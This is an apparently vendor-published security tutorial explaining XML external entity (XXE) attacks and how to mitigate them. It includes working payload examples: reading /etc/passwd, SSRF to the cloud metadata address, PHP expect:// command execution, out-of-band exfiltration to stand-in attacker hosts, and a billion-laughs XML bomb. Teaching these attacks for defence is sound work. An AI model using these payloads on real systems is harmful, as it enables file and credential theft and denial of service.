How to find and fix XML entity vulnerabilities
Michael Sherman
September 7, 2022
0 mins readXML is a human-readable text format used to transport and store structured data. Tags and data structures are defined by users in self-describing documents that are universally parsable by any XML tool, giving developers a highly configurable mechanism for data representation.
To build on XML’s limited base syntax, an author can define the structure and acceptable content of a document’s data using a document type definition (DTD). The DTD enables users to define a document’s valid data and describe data in one location for reuse throughout the document. A general entity is declared in the DTD, and then referenced in the document body by adding an ampersand (&) before its name and a semicolon (;) after.
You can define an entity in the document:
1<!ENTITY name "Taylor Gray">
2...
3<name>&name;</name>
However, you can also declare an entity in an external source by referencing a file path or URL:
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE person SYSTEM "person.dtd">
3<person>
4 <name>&name;</name>
5</person>
The person.dtd
file contains:
1<!ENTITY name "Taylor Gray">
Combined with XML’s simple syntax and the uniformity of most parsers, this capability makes it relatively simple for attackers to perform an attack called XML external entity (XXE) injection. In this post, we’re going to take a close look at XXE and explore ways to prevent it.
Why XXE represents a security risk
XXE injection attacks let attackers take advantage of external entity declarations to gain access to files or infrastructure on their target server or network. This can include sensitive personal information, business logic, and credentials.
In serious cases, attackers can commit a server-side request forgery, which lets them impersonate a server on their target’s network and may enable them to execute code remotely. This enables them to escalate their privileges to traverse their target’s infrastructure and attack other unprotected components — or propagate attacks appearing to originate from their target to other networks downstream.
Data retrieval
The most common XXE injection vulnerability lets attackers prompt a server to disclose sensitive data or files in an HTTP response. In isolation, this gives an attacker read-only access to data, but it can reveal information useful for escalating to a more damaging attack.
For example, an attacker can send a payload to a target server to cause the target server to display a local password file:
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE staffInfo
3[
4<!ENTITY xxe SYSTEM "file:///etc/pâsswd">
5]>
6<staffInfo>
7<username>&xxe;</username>
8<email>email</email>
9</staffInfo>
Implementing a robust data encryption protocol is effective in preventing data retrieval, as it renders the stored data unreadable and unusable — even if an attacker successfully infiltrates the target’s server. Using symmetric algorithms such as the advanced encryption standard (AES) to store and transfer sensitive XML-based information, you set a confidential security key that will be used to encrypt and decrypt your data.
Furthermore, disabling the XML parser’s default support for external entities is an effective mitigation strategy against this kind of attack.
Server-side request forgery
A server vulnerable to XXE injection presents an opportunity for an attacker to impersonate the server and make requests to internal resources not normally visible outside the network.
In a server-side request forgery (SSRF) attack, an attacker will typically inject a URL or address pointing to the vulnerable server’s local file system instance or other restricted-access resources — especially when user inputs are not properly filtered by the XML parser. They can then obtain credentials and gain administrative privileges within their target’s network:
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE userInfo
3[
4<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data">
5]>
6<userInfo>
7<username>&xxe;</username>
8<email>email</email>
9</userInfo>
If the attacker successfully gains administrative privileges, they can impersonate the server to probe their target’s network for additional vulnerabilities. They may even be able to remotely execute code and propagate further attacks.
There are a few remedies that significantly improve your application’s resilience to this kind of attack:
Block all unauthorized incoming user requests to internal resources and confidential addresses.
Consider implementing a comprehensive blocklist containing possible malicious addresses and URLs that may pose a threat to your web infrastructure.
Adopt intelligent static analysis tools (such as Snyk Code) capable of testing your code for vulnerabilities and security loopholes.
Remote code execution
An attacker can use XXE injection for remote code execution (RCE) on a target server.
For example, they can target a PHP-powered website or application where the Expect plugin is enabled by declaring an entity containing the expect wrapper to remotely execute commands:
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE userInfo
3[
4<!ENTITY xxe SYSTEM "expect://ifconfig">
5]>
6<userInfo>
7<username>&xxe;</username>
8<email>email</email>
9</userInfo>
The ifconfig
command in this example returns the server’s network configuration when the XML parser evaluates the xxe
entity.
We can prevent RCE by selectively disabling protocol wrappers, such as the Expect PHP extension, in our websites or web apps.
However, even in cases where there are no avenues of receiving a direct response from the server, an attacker can use blind XXE methods instead.
Blind XXE attacks
In some cases, XML parsers may prevent entity declarations in the body of the XML documents. An attacker can bypass this restriction by using parameter entities, which are only declared in the DTD or as the value of another entity. A parameter entity is declared by prepending its name with a percent sign and a whitespace character (%
), and then referenced by adding a percent sign (%
) before its name and a semicolon (;
) after.
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo
3[
4<!ENTITY % xxe SYSTEM "http://evil-attacker.com"> %xxe;
5]>
In this code, the targeted server will try to send the HTTP request to the attacker’s server URL. As a result, the attacker can perform the DNS lookup of the target server using this blind XXE attack.
Error-based information disclosure
Our server is vulnerable to blind XXE injection methods if an attacker can retrieve valuable data by examining the error messages our server emits.
For example, this payload coerces our server to disclose a /etc/pâsswd
file in its error message:
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo
3[
4<!ENTITY % badfile SYSTEM "file:///etc/pâsswd">
5<!ENTITY % wrapper "<!ENTITY % induce SYSTEM 'file:///nosuchfileexists/%badfile'>">
6%wrapper
7%induce
8]>
This payload defines three parameter entities: badfile
, populated by the content of the /etc/pâsswd
file, wrapper
, which contains the dynamic declaration of a new parameter entity named induce
, and the induce
entity, which induces a lookup to a path that triggers an error message.
To declare the wrapper
entity, the attacker dynamically declares the induce
entity, which contains a valid but nonexistent path containing the value of the badfile
parameter. Then, when the wrapper
entity is referenced, the dynamic declaration of the induce
entity will be initiated.
Finally, when the parser encounters the induce
entity, it returns an error message informing the user that the file with the name equal to the value of badfile
doesn’t exist on the nosuchfileexists
path. And since badfile
contains the contents of etc/pâsswd
, the information is displayed for the attacker.
A robust error-handling protocol can reduce our app’s vulnerability to error-based information disclosure. This protocol may include limiting the length and scope of the error messages that the server sends to the client. By using a custom message body and HTTP status code, we can avoid verbose, automatically generated error messages, as they essentially provide free reconnaissance for attackers.
We need to clearly define error messages for expected scenarios, such as those applicable to our example server’s FileNotFound
exception. Furthermore, we need to ensure that we specify appropriate error messages for edge cases, which usually requires us to test our code.
Out-of-band exfiltration
An out-of-band attack is used to exfiltrate data along a different channel than the one used to send the attack. This type of attack usually involves directing the target server to make a request to an address at which the attacker hosts a malicious external DTD.
First, they will have to send a compromised payload with the content of a malicious DTD, such as:
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo [
3<!ENTITY % xxe SYSTEM "http://evilattacker.com/corrupted.dtd">
4%xxe;
5]>
The corrupted.dtd
file on the attacker server contains:
1<?xml version="1.0" encoding="UTF-8"?>
2<!ENTITY % badfile SYSTEM "file:///etc/pâsswd">
3<!ENTITY % deval "<!ENTITY % revealinfo SYSTEM 'http://evilattacker.com/?x=%badfile;'>">
4% deval;
5% revealinfo ;
When the revealinfo
entity is executed, an HTTP request is sent to the attacker’s server with the value of badfile
embedded in the request string.
When the deval
entity is referenced, the dynamic declaration of the revealinfo
entity will be initiated.
Other vectors
Other common vectors for XXE attacks include:
File uploads, such as
.config
filesText input fields, especially those like HTML
text
andtextarea
fields, which may have limited input validation rulesXML-based technologies, such as RSS feeds and APIs
XML-based files, particularly common formats like SVG images
For example, an attacker can upload an SVG containing a link to a malicious document to execute an XML bomb attack:
1<svg width="128px" height="128px" xmlns="http://www.evilattacker.com/svg" xmlns:xlink="http://www.evilattacker.com/xlink" version="1.1">
2 <text font-size="16" x="0" y="16">&a4;</text>
3</svg>
The payload might look something like this:
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE test [
3 <!ELEMENT bin (#PCDATA)>
4 <!ENTITY a0 "garbage">
5 <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
6 <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
7 <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
8 <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
9]>
10<bin>&a4;</bin>
The parser sees several entity declarations in the DTD, but it doesn’t evaluate them right away. It then reads the document and encounters the bin
element, which it calls by expanding the a4
entity. However, to do so, it must expand the ten contained instances of the a3
entity, which requires it to expand the contained a2
entities — all the way down to a0
.
The final expanded size of the bin
element contains the recursive expansion of all the elements in the a4
entity. In a payload with ten or more levels of nested entities, the resulting file can be hundreds of gigabytes, typically causing an out-of-memory error for the server attempting to parse the SVG file — and a denial of service for our users.
Setting automatic memory or other resource usage limits for request processing is enough to prevent many types of DOS attack, as they generally rely on overwhelming a server’s capacity.
Universally applicable security practices
Disable support for external entities
Disallowing external entities and user-defined DTDs is often enough to mitigate many types of XXE injection attacks, and most tools provide single-line commands to achieve this.
Use a web application firewall (WAF)
Web application firewalls (WAFs) are great tools in combating XXE attacks generally, as they inspect HTTP traffic for potentially malicious content and apply filtering rules to protect our web applications.
Implement zero trust security
The trust relationship between your web applications and other external or third-party services (such as message brokers and user authentication platforms) can be exploited to launch a SSRF on your server infrastructure. Furthermore, services within your network should only be allowed to access the resources they need to function properly.
We should make sure to appropriately isolate logs and sensitive data, and implement strong processes to regularly audit access privileges for all users — both human and programmatic. This also makes security maintenance easier to manage in the long term.
Always run automated XXE vulnerability scans and testing
Automatic XXE vulnerability scans can help identify and address vulnerabilities in your infrastructure before an attacker exploits them. A comprehensive and intelligent detection system should also offer recommendations for how to further secure the system.
Keep your security patches up to date
It’s important that our systems have up-to-date patches from trusted security providers. These supports may include security driver updates and DOS protection patches. For the latest on open source vulnerabilities, we recommend using Snyk Open Source, which is powered by the comprehensive, accurate, and timely Snyk Vulnerability Database.
Reduce risks with Snyk protection capabilities
Third-party libraries are sometimes vulnerable to exploitation thereby exposing your application to attackers. To further boost your application’s defenses, we suggest using Snyk OSS to scan each third-party library that is integrated into your application.
You can also take advantage of the Snyk code capabilities to identify and catch potential security vulnerabilities before they are exploited.
Final thoughts on XML security
XML is a versatile and powerful tool for data transport — even more so because it enables us to dynamically use linked external resources. However, these characteristics make it a popular tool for malicious actors. To properly prevent and mitigate the risks associated with it, it’s vital to understand the potential vulnerabilities it can introduce.
Improperly sanitized user inputs, overly verbose error handling, and weakly configured access privileges open the possibility for attackers to use external entity (XXE) injection attacks to compromise our systems. An effective way to fix these vulnerabilities is to validate and filter user input and uploads, and in most cases to simply remove functionality like external DTD processing or PHP protocol wrappers.
Error messages are most appropriate when they communicate minimal information to the user. For example, if a user fails a login attempt, it’s not necessary to tell them whether it’s their password or username that didn’t pass.
We can also implement WAFs and DOS protections or use a service provider who offers these features. And, if an attacker does breach security, they should only encounter encrypted data and a network of zero-trust services.
Get started in capture the flag
Learn how to solve capture the flag challenges by watching our virtual 101 workshop on demand.